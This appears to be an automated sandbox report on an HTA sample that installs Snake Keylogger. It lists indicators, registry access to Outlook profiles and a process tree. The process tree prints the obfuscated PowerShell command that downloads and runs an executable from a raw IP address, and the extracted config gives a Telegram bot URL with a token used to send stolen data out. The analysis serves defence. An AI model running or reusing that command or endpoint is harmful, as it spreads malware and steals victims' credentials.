Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 01:41
Static task
static1
Behavioral task
behavioral1
Sample
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta
Resource
win10v2004-20241007-en
General
-
Target
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta
-
Size
165KB
-
MD5
44ad3c49b38f4f6f1739baf86d528fd3
-
SHA1
afcf27df0ee2373846a1f6b8027e9cfcea77c486
-
SHA256
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
-
SHA512
e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
-
SSDEEP
96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/4696-90-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 20 772 PoweRsHELl.ExE -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 772 PoweRsHELl.ExE 2124 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 2860 taskhostw.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023b84-74.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2860 set thread context of 4696 2860 taskhostw.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoweRsHELl.ExE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 772 PoweRsHELl.ExE 772 PoweRsHELl.ExE 2124 powershell.exe 2124 powershell.exe 4696 RegSvcs.exe 4696 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2860 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 772 PoweRsHELl.ExE Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 4696 RegSvcs.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 3256 wrote to memory of 772 3256 mshta.exe 85 PID 3256 wrote to memory of 772 3256 mshta.exe 85 PID 3256 wrote to memory of 772 3256 mshta.exe 85 PID 772 wrote to memory of 2124 772 PoweRsHELl.ExE 89 PID 772 wrote to memory of 2124 772 PoweRsHELl.ExE 89 PID 772 wrote to memory of 2124 772 PoweRsHELl.ExE 89 PID 772 wrote to memory of 1940 772 PoweRsHELl.ExE 93 PID 772 wrote to memory of 1940 772 PoweRsHELl.ExE 93 PID 772 wrote to memory of 1940 772 PoweRsHELl.ExE 93 PID 1940 wrote to memory of 648 1940 csc.exe 95 PID 1940 wrote to memory of 648 1940 csc.exe 95 PID 1940 wrote to memory of 648 1940 csc.exe 95 PID 772 wrote to memory of 2860 772 PoweRsHELl.ExE 98 PID 772 wrote to memory of 2860 772 PoweRsHELl.ExE 98 PID 772 wrote to memory of 2860 772 PoweRsHELl.ExE 98 PID 2860 wrote to memory of 4696 2860 taskhostw.exe 99 PID 2860 wrote to memory of 4696 2860 taskhostw.exe 99 PID 2860 wrote to memory of 4696 2860 taskhostw.exe 99 PID 2860 wrote to memory of 4696 2860 taskhostw.exe 99 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE"C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\upyaxiqs\upyaxiqs.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB054.tmp" "c:\Users\Admin\AppData\Local\Temp\upyaxiqs\CSC72648FF7DFE243839548E0CE4642788.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:648
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4696
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5e6cdfea27d70242a9b6934ea227d8b7d
SHA100747deb2dfd8db74300702468199f737ee3abcc
SHA256e824b1d7d29b3cf0e518571eeaeef902b68d7c5c26f193122dfa3f03e15aed42
SHA512969b6b2dbf9f0d28dab21121e7adee9892632d145a73a8730d39b3cf590cd5d4350a85683c220be28d5abcaf82ed795718c613d0e98f8d5feceec39ce8714b84
-
Filesize
1KB
MD54164c6c34710670605f609249d20d82a
SHA173d79b1b9bd03c3b708b82128278d1dd189f8103
SHA25624d8b7619fd5b4fdd3f63b838370dd616fa03745069151e0a5443e8c1b95ff95
SHA512a85c699832692cddbad083a96dae6e2e9b039dc8a11941996a60d2a83f671cb7e713b98d0d12de7f7a8c899f944cb7c208ae781fb3f25a1c55eb3cde2ae11ebf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5a8c1b83835a4b540b879f2308ad810a4
SHA11eac1fbebcddf6f0324f42a247258020dad67f49
SHA2564cc471b19f7d4bc201caa59e7ca643faa619243bdccd29b99c7d230122be9c50
SHA512ad2d547ed29d3e9e6e449a8ca69d46ed645415840ac4d6d29652eb11bbfe34b3c4270461c8ad7cfa627685be2a39640cb56cde5da60d582922a0cc477717536d
-
Filesize
948KB
MD53e2f27edd3deacd8f08f6ed1133b2040
SHA1060e3218949c5a006bb8607e8228e6539b737bfb
SHA256163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86
SHA512da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42
-
Filesize
652B
MD531e4ea0b6e9f53b01f3f62d4f6fddbb1
SHA1f8f9d0dd2f1084fcc135f65b389c605a868526d9
SHA2564326b0751eb1dc2abfe8affd7a197fc20e8f6c1637a4780cbc78d40ead18ceea
SHA5123374c75172bd5a5ccfb6944e18ee11b11cbdb1b6a1698e59c4480b0fe4b0c519f6a5cfbd672472c2b9fa4f415ff997761e3b3b9c6e3811404077e56bb075907c
-
Filesize
475B
MD5ecc2c10cb4c5954e2d5156bce54e41f4
SHA12d7cde31f9942c1dc80c493c03d675962991bf31
SHA25621d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac
SHA512bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96
-
Filesize
369B
MD5784f53ab1897e19293b9212b5afaadf9
SHA1bd23c6b7e37d46c2418a95f33827a896411a1302
SHA25657fc1823a9536f3de80c02a48300821052c9524c33c3f6355b303bc3b22b9ea2
SHA51270ca938cd5c13f5e107853d3f424936d37741548e98d97fb4d92119fa4407ab03e9fbe97717e4a871f87a574cb715e92406ad93c6eeab39ae96c9504cd561e07